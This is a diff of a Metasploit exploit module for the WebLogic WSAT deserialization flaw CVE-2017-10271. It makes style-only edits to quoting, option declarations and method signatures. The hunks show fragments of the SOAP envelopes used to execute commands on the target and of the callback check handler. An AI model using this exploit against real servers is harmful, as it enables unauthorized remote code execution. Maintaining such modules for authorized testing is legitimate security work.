@@ -35,8 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2017-10271'],
           ['EDB', '43458']
         ],
-        'Platform' => %w{win unix},
-        'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
           [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
@@ -56,8 +54,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
-      OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
-      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
+      OptPort.new('RPORT', [true, 'The remote port that the WebLogic WSAT endpoint listens on', 7001]),
+      OptFloat.new('TIMEOUT', [true, 'The timeout value of requests to RHOST', 20.0]),
       # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
     ])
   end
@@ -83,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def exploit_process_builder_payload
     # Generate a payload which will execute on a *nix machine using /bin/sh
-    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+    %(<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
   <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
       <java>
@@ -105,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
     </work:WorkContext>
   </soapenv:Header>
   <soapenv:Body/>
-</soapenv:Envelope>}
+</soapenv:Envelope>)
   end
 
   #
@@ -113,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # from the target machine.
   #
   def check_process_builder_payload
-    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+    %(<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
   <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
       <java version="1.8" class="java.beans.XMLDecoder">
@@ -127,14 +125,14 @@ class MetasploitModule < Msf::Exploit::Remote
     </work:WorkContext>
     </soapenv:Header>
   <soapenv:Body/>
-</soapenv:Envelope>}
+</soapenv:Envelope>)
   end
 
   #
   # In the event that a 'check' host responds, we should respond randomly so that we don't clog up
   # the logs too much with a no response error or similar.
   #
-  def on_request_uri(cli, request)
+  def on_request_uri(cli, _request)
     random_content = '<html><head></head><body><p>' + Rex::Text.rand_text_alphanumeric(20) + '<p></body></html>'
     send_response(cli, random_content)
 
